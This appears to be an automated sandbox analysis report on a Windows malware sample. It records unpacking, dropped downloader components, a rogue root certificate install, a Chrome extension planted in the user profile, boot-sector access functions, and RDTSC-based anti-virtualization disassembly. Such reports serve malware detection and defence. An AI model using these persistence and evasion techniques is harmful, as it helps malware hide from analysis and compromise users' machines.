Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_user.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000012.00000000.397410202.000000000099C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIDCDD.tmp.1.dr

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeUnpacked PE file: 2.2.56BB1610C0318054.exe.2810000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeUnpacked PE file: 4.2.56BB1610C0318054.exe.2560000.3.unpack
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: MSIDCDD.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x2d22
Source: Cyfj6XGbkd.exeStatic PE information: real checksum: 0xd69e9 should be: 0x41116d
Source: 56BB1610C0318054.exe.0.drStatic PE information: real checksum: 0xd69e9 should be: 0x41116d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_004038A0 push eax; ret
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10010579 push ecx; ret
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 1_2_046BD9FC pushfd ; iretd
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10010579 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040E2F1 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00993FB5 push ecx; ret

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Installs new ROOT certificatesShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD BlobJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\download_user.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDCDD.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Roaming\1611970637183.exeJump to dropped file
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon48.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.htmlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\background.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\book.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\jquery-1.8.3.min.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\manifest.jsonJump to behavior

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1611970637183.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100204C0
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403BD4 second address: 0000000000403BDA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403BFC second address: 0000000000403C02 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C23 second address: 0000000000403C29 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C43 second address: 0000000000403C49 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825641h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C6C second address: 0000000000403C72 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C92 second address: 0000000000403C98 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403CB7 second address: 0000000000403CBD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403FB0 second address: 0000000000403FB6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403FD3 second address: 0000000000403FD9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000403FFC second address: 0000000000404002 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404029 second address: 000000000040402F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC8256EAh 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404109 second address: 000000000040410F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F47FC82584Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404137 second address: 000000000040413D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404161 second address: 0000000000404167 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825639h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040417F second address: 0000000000404185 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041A9 second address: 00000000004041AF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825647h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041D6 second address: 00000000004041DC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041F9 second address: 00000000004041FF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404223 second address: 0000000000404229 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404245 second address: 000000000040424B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040426A second address: 0000000000404270 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040428F second address: 0000000000404295 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004042B3 second address: 00000000004042B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004042D8 second address: 00000000004042DE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
